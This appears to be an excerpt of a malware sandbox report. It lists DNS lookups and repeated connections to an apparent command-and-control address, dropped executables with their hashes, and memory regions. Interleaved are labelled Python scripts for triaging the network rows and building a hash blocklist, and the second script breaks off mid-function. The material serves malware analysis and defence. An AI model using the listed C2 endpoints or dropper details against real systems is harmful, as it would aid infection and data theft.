US 8.8.8.8:53 live.goatgame.live udp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 iplogger.org udp
US 104.26.2.46:443 iplogger.org tcp
US 8.8.8.8:53 46.2.26.104.in-addr.arpa udp
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 live.goatgame.live udp
LV 45.142.213.135:30058 tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 live.goatgame.live udp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 live.goatgame.live udp
SG 37.0.10.236:80 tcp
US 8.8.8.8:53 live.goatgame.live udp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 live.goatgame.live udp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 live.goatgame.live udp
LV 45.142.213.135:30058 tcp
SG 37.0.10.236:80 tcp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 live.goatgame.live udp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 live.goatgame.live udp
SG 37.0.10.236:80 tcp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 live.goatgame.live udp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 live.goatgame.live udp
LV 45.142.213.135:30058 tcp
SG 37.0.10.236:80 tcp
US 8.8.8.8:53 live.goatgame.live udp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 live.goatgame.live udp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 live.goatgame.live udp
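Added example, not part of the sandbox output: a small Python triage pass over rows in the layout of the network table above. It takes a constructed subset of those rows, separates forward DNS lookups from the resolver's PTR chatter and from loopback/mDNS noise, counts repeated hits to one endpoint (45.142.213.135:30058 is contacted again and again in this run), and lists connections that never involved a hostname, which no DNS-based block will catch. FLAGGED_SERVICES holds the two hosts this report itself tags as abused legitimate services; the threshold of three repeats is an assumption, not something the sandbox defines.

```python
import re
from collections import Counter

# Constructed sample: a subset of rows copied from the network table above,
# in the report's layout "<country> <ip>:<port> [<host>] <tcp|udp>".
SAMPLE_ROWS = """\
US 8.8.8.8:53 iplogger.org udp
US 8.8.8.8:53 166.75.67.172.in-addr.arpa udp
US 104.26.3.46:443 iplogger.org tcp
US 8.8.8.8:53 live.goatgame.live udp
US 74.114.154.22:443 prophefliloc.tumblr.com tcp
MD 176.123.2.239:80 176.123.2.239 tcp
N/A 127.0.0.1:63294 tcp
SG 37.0.11.8:80 tcp
US 172.67.133.215:80 wfsdragon.ru tcp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 live.goatgame.live udp
LV 45.142.213.135:30058 tcp
SG 37.0.10.236:80 tcp
LV 45.142.213.135:30058 tcp
N/A 224.0.0.251:5353 udp
LV 45.142.213.135:30058 tcp
"""

ROW = re.compile(r"^(?P<cc>\S+)\s+(?P<ip>[\d.]+):(?P<port>\d+)"
                 r"(?:\s+(?P<host>\S+))?\s+(?P<proto>tcp|udp)$")

# Hosts this report itself tags under "Legitimate hosting services abused for malware hosting/C2".
FLAGGED_SERVICES = {"iplogger.org", "raw.githubusercontent.com"}


def parse_rows(text):
    """Turn the flat rows into dicts; lines that do not fit the layout are skipped."""
    rows = []
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if m:
            row = m.groupdict()
            row["port"] = int(row["port"])
            rows.append(row)
    return rows


def is_dns(row):
    return row["proto"] == "udp" and row["port"] == 53


def is_local_noise(row):
    """Loopback and mDNS rows name no attacker infrastructure."""
    return row["ip"].startswith("127.") or row["ip"] == "224.0.0.251"


def queried_names(rows):
    """Forward lookups only; the in-addr.arpa PTR queries are the sandbox resolving its own peers."""
    return sorted({r["host"] for r in rows
                   if is_dns(r) and r["host"] and not r["host"].endswith(".in-addr.arpa")})


def connections(rows):
    """Non-DNS, non-local rows as (ip:port, host or None)."""
    return [(f"{r['ip']}:{r['port']}", r["host"])
            for r in rows if not is_dns(r) and not is_local_noise(r)]


def repeated_endpoints(rows, min_count=3):
    """Endpoints hit min_count or more times in one run: the shape a C2 socket leaves behind."""
    counts = Counter(ep for ep, _ in connections(rows))
    return {ep: n for ep, n in counts.items() if n >= min_count}


def bare_ip_endpoints(rows):
    """Connections made with no hostname at all (or the host column just repeats the IP):
    hard-coded C2 addresses that DNS filtering never sees."""
    return sorted({ep for ep, host in connections(rows)
                   if host is None or host == ep.split(":")[0]})


def summarize(text):
    rows = parse_rows(text)
    names = queried_names(rows)
    return {
        "dns_names": names,
        "flagged_services": sorted(n for n in names if n in FLAGGED_SERVICES),
        "endpoints": sorted({ep for ep, _ in connections(rows)}),
        "beacons": repeated_endpoints(rows),
        "bare_ip": bare_ip_endpoints(rows),
    }


if __name__ == "__main__":
    for key, value in summarize(SAMPLE_ROWS).items():
        print(f"{key}: {value}")
```

On the full table the same pass returns the same four bare-IP endpoints and a far higher repeat count for 45.142.213.135:30058; the country column is deliberately ignored, since it says nothing about whether an endpoint is hostile.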

Files

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 97a16c7e8ab8b16125957a42033e7047
SHA1 6a4830c58f1cda695bf43b40e152f28e611f9bff
SHA256 760ce585eb4dd375c916e4fae47e013090e8ca19b4abae149484dfa9b7761111
SHA512 2efc118a860b130c2ca6a1029b5dfac28abb1a6f7d0c67744638aa6cb9be32f40afa6e3dd79b9db916926bc7cf3fb9feea170f28dc54a7e35da49dc89206ab44

C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\setup_install.exe

MD5 25eb7c88cb3002c4029dd7e1aec7f63b
SHA1 cf1bf4283ee16d0a94fc65c82233f9eb69b1db70
SHA256 152b187c8a5d36e4b7f7728a0ac261294790f84b269b6e872ef24d966bcc5ca2
SHA512 f0c627bcb6774253e7c3689265ae30241cb77b45aa0adf0434bb26c173ac43dfd188a6ac7b36a152d1c145afe34a73ea3f765a9892eff0d7b96960d47c58137d

C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

memory/1608-46-0x0000000064940000-0x0000000064959000-memory.dmp

memory/1608-45-0x0000000064941000-0x000000006494F000-memory.dmp

memory/1608-44-0x000000006FE40000-0x000000006FFC6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

memory/1608-49-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/1608-48-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/1608-47-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/1608-55-0x000000006B280000-0x000000006B2A6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\61d1121b032c3d74.exe

MD5 2b32e3fb6d4deb5e9f825f9c9f0c75a6
SHA1 2049fdbbe5b72ff06a7746b57582c9faa6186146
SHA256 8bd8f7a32de3d979cae2f487ad2cc5a495afa1bfb1c740e337c47d1e2196e1f2
SHA512 ad811d1882aa33cce0ebbab82e3f2db7596f88392cd9c142aef0b0caa4004afcf0253f25e7a8f228778dd3a2ec43d2028985a3e85807438c5bed3ae4709f9cfa

C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\0637ac7677d0cf7.exe

MD5 7e06ee9bf79e2861433d6d2b8ff4694d
SHA1 28de30147de38f968958e91770e69ceb33e35eb5
SHA256 e254914f5f7feb6bf10041e2c705d469bc2b292d709dc944381db5911beb1d9f
SHA512 225cd5e37dbc29aad1d242582748457112b0adb626541a6876c2c6a0e6a27d986791654fd94458e557c628dc16db17f22db037853fae7c41dde34ba4e7245081

C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\17e6077dcf7a402.exe

MD5 3263859df4866bf393d46f06f331a08f
SHA1 5b4665de13c9727a502f4d11afb800b075929d6c
SHA256 9dcacda3913e30cafd92c909648b5bffde14b8e39e6adbfb15628006c0d4d3c2
SHA512 58205110a017f5d73dd131fefb1e3bbbcc670ed0c645aeefebe5281579c7b1dceffa56671cd7b186554bdb81710e21018ed0d7088a27517dfc5e48d6d3578cf6

memory/1612-97-0x0000000000FB0000-0x0000000000FB8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\5d456d381f2e010.exe

MD5 0965da18bfbf19bafb1c414882e19081
SHA1 e4556bac206f74d3a3d3f637e594507c30707240
SHA256 1cdddf182f161ab789edfcc68a0706d0b8412a9ba67a3f918fe60fab270eabff
SHA512 fe4702a2fde36b4fb0015ad7d3e2169a1ccbf5e29d7edef40f104ed47661b4b0365b13b1913e9f4e0ab7bc9ac542ee86c02a802a13567dfd0b8f5485a5be829b

memory/1864-106-0x0000000000B90000-0x0000000000BBC000-memory.dmp

memory/1864-107-0x0000000002B10000-0x0000000002B16000-memory.dmp

memory/2544-108-0x0000000000280000-0x000000000036E000-memory.dmp

memory/1864-111-0x0000000002B50000-0x0000000002B56000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\5d456d381f2e1.exe

MD5 6cae1487c1ba88b65eead225c280d78c
SHA1 e2624ce9267706b64ee724abe6e7dc8e1dcafd32
SHA256 d3cd0b6963c1b88ff327eee0953c9e30ed3fe4ed7cc198a949b285b626c237d6
SHA512 7bc375e863cc33a7f9c7b24a4c050a73d74a6cc5002713ec1fc3eed8760a8883dd4c7b9f0f3e9c008a71d66b692c4ff8620d574b0f48c0ce531d8f0d4e8fa45a

memory/3608-116-0x0000000000250000-0x0000000000392000-memory.dmp

memory/3608-118-0x0000000004C70000-0x0000000004D02000-memory.dmp

memory/3608-119-0x0000000004C40000-0x0000000004C4A000-memory.dmp

memory/3608-117-0x0000000005320000-0x00000000058C4000-memory.dmp

memory/1864-109-0x0000000002B20000-0x0000000002B40000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

MD5 ef5fa848e94c287b76178579cf9b4ad0
SHA1 560215a7c4c3f1095f0a9fb24e2df52d50de0237
SHA256 949eec48613bd1ce5dd05631602e1e1571fa9d6b0034ab1bffe313e923aff29c
SHA512 7d4184aa762f3db66cf36955f20374bf55f4c5dbe60130deaeade392296a4124867c141f1d5e7fbf60b640ef09cce8fb04b76b7dd20cbac2ce4033f9882a1071

C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\97c06d9b6fa6f9.exe

MD5 13a289feeb15827860a55bbc5e5d498f
SHA1 e1f0a544fcc5b3bc0ab6a788343185ad1ad077ad
SHA256 c5483b2acbb352dc5c9a811d9616c4519f0e07c13905552be5ec869613ada775
SHA512 00c225fb1d88920c5df7bb853d32213a91254fb8c57169c58c8b0ffab4501486e24d87e3d8f5665b16e366362cb81deec535d833ed42434fdc31f0400ee7ffa7

C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\d5a6f77b01f6.exe

MD5 7aaf005f77eea53dc227734db8d7090b
SHA1 b6be1dde4cf73bbf0d47c9e07734e96b3442ed59
SHA256 a5f373f8bcfae3d9f4895c477206de63f66f08e66b413114cf2666bed798eb71
SHA512 19dc8764c5347a73767caed67a8a3f2fe0ecb07cacf2f7b2a27a48592780dede684cfb52932695a79725a047f2c092b29a52b5fd0c7dc024a0166e6ada25633d

C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\08280a9f8.exe

MD5 5866ab1fae31526ed81bfbdf95220190
SHA1 75a5e08b3b9ad2dff35dfbbb3ffe8d983c2be25f
SHA256 9e1a149370efe9814bf2cbd87acfcfa410d1769efd86a9722da4373d6716d22e
SHA512 8d99ab09e84e4ef309da34be94946cbfcffeb1c0ca49e2452deb738d801e551062ebb134f1b99a9baf03003a8e720d525521ce09aeac341d3cba3fcfbc618fb5

C:\Users\Admin\AppData\Local\Temp\7zS0B6DABA7\f08378aa2c3.exe

MD5 7e51418ec90a49b4b6b3ce8e4ba26ba1
SHA1 9cc182ef14b4731d3c45930161afb0ee170d885c
SHA256 50c924e0f3b319b8f66278419f3c0dbd14c1c7d8d33e32d70ee1a959df30d4ae
SHA512 eadb844d9e570bc9339289a2dc4d5d76cc36ada19ff653af9e2a932d1aea083e33bebe65471637ff54e2ac8c36573bbcc243dd617d4391aef53a9fb184f41f7b

memory/3608-120-0x0000000004FB0000-0x000000000504C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\chrome2.exe

MD5 ad0aca1934f02768fd5fedaf4d9762a3
SHA1 0e5b8372015d81200c4eff22823e854d0030f305
SHA256 dc10f50f9761f6fbafe665e75a331b2048a285b1857ad95e0611ace825cba388
SHA512 2fba342010ba85440784190245f74ea9e7c70974df12c241ccb6b72a6e1006a72bd1fa2e657f434d7479758f9508edb315398f6e95d167a78b788cea732be3b7

memory/3756-132-0x0000000000730000-0x0000000000740000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\setup.exe

MD5 01ad10e59fa396af2d5443c5a14c1b21
SHA1 f209a4f0bb2a96e3ee6a55689e7f00e79c04f722
SHA256 bef1cffaba8186ce62265e0b322ca9fd9326a8929591df569a4953456c752137
SHA512 1e067ade999ff933a644fde66c6ab9abb8a960ce1c8064368adcde4c09d924bd22d1b43c68b7c968e982fc75937969a2876e9e2a024f72e693f9ba397d449e02

memory/2460-141-0x0000000000400000-0x00000000004E4000-memory.dmp

memory/1608-167-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/1608-169-0x0000000064940000-0x0000000064959000-memory.dmp

memory/1608-168-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/1608-164-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/1608-160-0x0000000000400000-0x00000000009D2000-memory.dmp

memory/1416-170-0x0000000000400000-0x0000000002C6E000-memory.dmp

memory/1608-166-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/1608-53-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/1608-51-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/1608-52-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/1608-50-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/1608-54-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/1608-39-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/1608-37-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/3608-175-0x0000000002520000-0x0000000002532000-memory.dmp

C:\ProgramData\softokn3.dll

MD5 a378c450e6ad9f1e0356ed46da190990
SHA1 d457a2c162391d2ea30ec2dc62c8fb3b973f6a66
SHA256 b745b0c0db87a89de5e542e9ae0a06f585793ac3f4240bff3524e7dbdba79978
SHA512 e6cdc8f570af97e48b1d8968730db0afc46f9dd6ad7366a936a5518801debb61c86cc61526e5e26e7ad3b3daeb76a19b32d7c0da33140597f6d19163683c12b5

memory/3708-188-0x0000000000D90000-0x0000000000DEA000-memory.dmp

memory/3928-189-0x0000000000630000-0x000000000070D000-memory.dmp

memory/3756-197-0x00000000010E0000-0x00000000010EE000-memory.dmp

memory/2448-199-0x0000000000400000-0x0000000002CC9000-memory.dmp

memory/3608-200-0x0000000008CB0000-0x0000000008D3C000-memory.dmp

memory/3608-201-0x00000000052F0000-0x000000000530E000-memory.dmp

memory/2460-202-0x0000000000400000-0x000000000041E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE

MD5 a628baa97881fa5528009c9470cadee0
SHA1 583aa730e302fe0015cdb0dee4e279f193d66d87
SHA256 e2bb9ee3616cd827cc3ee297cbe24cfbd2ded4d9efe894e68453f6cfbf18e4c5
SHA512 c84e496e13d30c24efd020f25f4cd55b6157feb529f7285d97445c386fd50a50e943b0f67745a861a97c5bf0c4ff7dee7b5240d52c59b66421a9bdc26de58faf

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\1cr.exe.log

MD5 8ec831f3e3a3f77e4a7b9cd32b48384c
SHA1 d83f09fd87c5bd86e045873c231c14836e76a05c
SHA256 7667e538030e3f8ce2886e47a01af24cb0ea70528b1e821c5d8832c5076cb982
SHA512 26bffa2406b66368bd412bf25869a792631455645992cdcade2dbc13a2e56fb546414a6a9223b94c96c38d89187add6678d4779a88b38b0c9e36be8527b213c3

memory/2460-212-0x00000000056A0000-0x00000000056B2000-memory.dmp

memory/2460-211-0x0000000005C00000-0x0000000006218000-memory.dmp

memory/2460-213-0x0000000005740000-0x000000000577C000-memory.dmp

memory/4040-214-0x0000000002D40000-0x0000000002D76000-memory.dmp

memory/2460-215-0x0000000005780000-0x00000000057CC000-memory.dmp

memory/4040-216-0x0000000005750000-0x0000000005D78000-memory.dmp

memory/2460-220-0x00000000059F0000-0x0000000005AFA000-memory.dmp

memory/4040-219-0x0000000005EB0000-0x0000000005ED2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1einyrq0.bl2.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4040-231-0x00000000060C0000-0x0000000006126000-memory.dmp

memory/4040-227-0x0000000005F50000-0x0000000005FB6000-memory.dmp

memory/4040-232-0x0000000006130000-0x0000000006484000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS5CA2.tmp\Install.cmd

MD5 a3c236c7c80bbcad8a4efe06a5253731
SHA1 f48877ba24a1c5c5e070ca5ecb4f1fb4db363c07
SHA256 9a9e87561a30b24ad4ad95c763ec931a7cfcc0f4a5c23d12336807a61b089d7d
SHA512 dc73af4694b0d8390bcae0e9fd673b982d2c39f20ca4382fddc6475a70891ce9d8e86c2501d149e308c18cd4d3a335cc3411157de23acf6557ed21578c5f49cc

memory/4040-234-0x0000000006620000-0x000000000663E000-memory.dmp

memory/4040-237-0x0000000074510000-0x000000007455C000-memory.dmp

memory/4040-247-0x0000000006AC0000-0x0000000006ADE000-memory.dmp

memory/4040-248-0x00000000076B0000-0x0000000007753000-memory.dmp

memory/4040-236-0x0000000006AE0000-0x0000000006B12000-memory.dmp

memory/4040-250-0x0000000007FE0000-0x000000000865A000-memory.dmp

memory/4040-251-0x0000000007960000-0x000000000797A000-memory.dmp

memory/4040-252-0x00000000079C0000-0x00000000079CA000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 d22073dea53e79d9b824f27ac5e9813e
SHA1 6d8a7281241248431a1571e6ddc55798b01fa961
SHA256 86713962c3bb287964678b148ee08ea83fb83483dff8be91c8a6085ca560b2a6
SHA512 97152091ee24b6e713b8ec8123cb62511f8a7e8a6c6c3f2f6727d0a60497be28814613b476009b853575d4931e5df950e28a41afbf6707cb672206f1219c4413

memory/4040-258-0x0000000007BD0000-0x0000000007C66000-memory.dmp

memory/4040-259-0x0000000007B50000-0x0000000007B61000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 bffcefacce25cd03f3d5c9446ddb903d
SHA1 8923f84aa86db316d2f5c122fe3874bbe26f3bab
SHA256 23e7cbbf64c81122c3cb30a0933c10a320e254447771737a326ce37a0694d405
SHA512 761dae5315b35ec0b2fe68019881397f5d2eadba3963aba79a89f8953a0cd705012d7faf3a204a5f36008926b9f614980e333351596b06ce7058d744345ce2e7

\??\pipe\LOCAL\crashpad_4860_MQULTQBAAVPCTOBR

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 d6b732916368ed54e8b34e6ed3d7868f
SHA1 da934d3c90ed0995335841243cda49c557b7791b
SHA256 8d0025a5073952cf5a3e7234c387c8e5d616af0a16bf61cc9bbb98fb1f81f1e1
SHA512 eadbc787e36e1bf7d80e8ce1216c41915b94bfaf7e62f89d9d49d0ee819ea39792af194e3f63be80dfa2789f2822296f85ffe4a24fef37767ec596f3c4a0a239

memory/4040-276-0x0000000007B80000-0x0000000007B8E000-memory.dmp

memory/4040-277-0x0000000007B90000-0x0000000007BA4000-memory.dmp

memory/4040-278-0x0000000007C90000-0x0000000007CAA000-memory.dmp

memory/4040-279-0x0000000007C70000-0x0000000007C78000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 448d0e6ecf61e761d9260e83354dd6c9
SHA1 0d6a8972378a11d9ab0cfb41866f8aad66597d55
SHA256 675be04a548f9ded9a2ff5c4da666b6504be9cf1cc8ae02bc32259c197c44a73
SHA512 d8d327b54cd108fa0924fe4f0ce1cf24f2de289a1475cbc35499976be9066940fef85066ad10002d1e62c12b80478e19fadfcc13ec689271fd5cbd483eed86d9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 33892bbf8cc75ef069eb2e941faadea5
SHA1 367e3d87cc75ece568de3398f4d2378c2cfbae4a
SHA256 2d76000977bb6150b83dbb3a33a53d2ead887355b896b6a6715b753d9a6210da
SHA512 64bbf3391cd221c7b67b34bfe70ef7ac3380f5075e2eb652d6ed5f5e3f4f936e071c4186e20ca4fb176df52e70e9c514d4773ed085ec9e68bc5b08e86f02b30b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 4bc8a3540a546cfe044e0ed1a0a22a95
SHA1 5387f78f1816dee5393bfca1fffe49cede5f59c1
SHA256 f90fcadf34fbec9cabd9bcfdea0a63a1938aef5ea4c1f7b313e77f5d3f5bbdca
SHA512 e75437d833a3073132beed8280d30e4bb99b32e94d8671528aec53f39231c30476afb9067791e4eb9f1258611c167bfe98b09986d1877ca3ed96ea37b8bceecf
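Added example, not from the report: a parser for the Files list layout above (path, then MD5/SHA1/SHA256/SHA512 lines, with memory/<pid>-<n>-<start>-<end>-memory.dmp entries in between). It validates digest lengths, recognises the digests of empty input (the crashpad pipe entry above carries exactly those), and keeps browser profile files, the CLR usage log and PowerShell's own __PSScriptPolicyTest_ probe file out of the blocklist, because the host software writes those itself. The sample records are copied from the list above; the host-artifact path list is the editor's triage heuristic, not something the sandbox emits.

```python
import hashlib
import re

# Constructed sample: four records and two memory regions copied from the Files
# list above, in the report's layout (path, blank line, four hash lines).
SAMPLE_FILES = r"""
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

MD5 ef5fa848e94c287b76178579cf9b4ad0
SHA1 560215a7c4c3f1095f0a9fb24e2df52d50de0237
SHA256 949eec48613bd1ce5dd05631602e1e1571fa9d6b0034ab1bffe313e923aff29c
SHA512 7d4184aa762f3db66cf36955f20374bf55f4c5dbe60130deaeade392296a4124867c141f1d5e7fbf60b640ef09cce8fb04b76b7dd20cbac2ce4033f9882a1071

memory/1608-160-0x0000000000400000-0x00000000009D2000-memory.dmp

memory/1608-166-0x000000006B440000-0x000000006B4CF000-memory.dmp

C:\ProgramData\softokn3.dll

MD5 a378c450e6ad9f1e0356ed46da190990
SHA1 d457a2c162391d2ea30ec2dc62c8fb3b973f6a66
SHA256 b745b0c0db87a89de5e542e9ae0a06f585793ac3f4240bff3524e7dbdba79978
SHA512 e6cdc8f570af97e48b1d8968730db0afc46f9dd6ad7366a936a5518801debb61c86cc61526e5e26e7ad3b3daeb76a19b32d7c0da33140597f6d19163683c12b5

\??\pipe\LOCAL\crashpad_4860_MQULTQBAAVPCTOBR

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 d6b732916368ed54e8b34e6ed3d7868f
SHA1 da934d3c90ed0995335841243cda49c557b7791b
SHA256 8d0025a5073952cf5a3e7234c387c8e5d616af0a16bf61cc9bbb98fb1f81f1e1
SHA512 eadbc787e36e1bf7d80e8ce1216c41915b94bfaf7e62f89d9d49d0ee819ea39792af194e3f63be80dfa2789f2822296f85ffe4a24fef37767ec596f3c4a0a239
"""

HASH_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
# Digests of zero bytes, computed rather than pasted: a record carrying all four
# describes an object with no content (the crashpad pipe above), not a payload.
EMPTY = {algo: getattr(hashlib, algo.lower())(b"").hexdigest() for algo in HASH_LEN}
HASH_LINE = re.compile(r"^(MD5|SHA1|SHA256|SHA512)\s+([0-9a-fA-F]+)$")
MEM_LINE = re.compile(r"^memory/(?P<pid>\d+)-(?P<seq>\d+)-0x(?P<start>[0-9A-Fa-f]+)"
                      r"-0x(?P<end>[0-9A-Fa-f]+)-memory\.dmp$")
# Editor's triage heuristic (not emitted by the sandbox): paths the host software
# writes on its own, so their hashes identify Edge, the CLR or PowerShell, not the sample.
HOST_ARTIFACT_MARKERS = (
    "\\Microsoft\\Edge\\User Data\\",   # browser profile state
    "\\CLR_v4.0_32\\UsageLogs\\",       # .NET runtime usage log (it does tell you the dropper is managed code)
    "\\__PSScriptPolicyTest_",          # PowerShell's own AppLocker/WDAC policy probe file
    "\\??\\pipe\\",                     # named pipe object
)


def parse_files(text):
    """Return (file records, memory regions) from the Files list layout."""
    files, regions, current = [], [], None
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = MEM_LINE.match(line)
        if m:
            start, end = int(m["start"], 16), int(m["end"], 16)
            regions.append({"pid": int(m["pid"]), "start": start, "size": end - start})
            current = None
            continue
        h = HASH_LINE.match(line)
        if h and current is not None:
            current[h.group(1).lower()] = h.group(2).lower()
            continue
        current = {"path": line}
        files.append(current)
    return files, regions


def invalid_hashes(files):
    """(path, algorithm) pairs whose digest is missing or the wrong length: copy damage, do not ship them."""
    return [(f["path"], algo) for f in files for algo, n in HASH_LEN.items()
            if len(f.get(algo.lower(), "")) != n]


def is_empty_content(record):
    return all(record.get(algo.lower()) == EMPTY[algo] for algo in HASH_LEN)


def classify(record):
    if is_empty_content(record):
        return "empty"
    if any(marker in record["path"] for marker in HOST_ARTIFACT_MARKERS):
        return "host-artifact"
    return "ioc"


def blocklist(files):
    """SHA256 values worth pushing to a blocklist: dropped content, nothing the host wrote itself."""
    return sorted(f["sha256"] for f in files if classify(f) == "ioc")


def image_base_regions(regions, base=0x400000):
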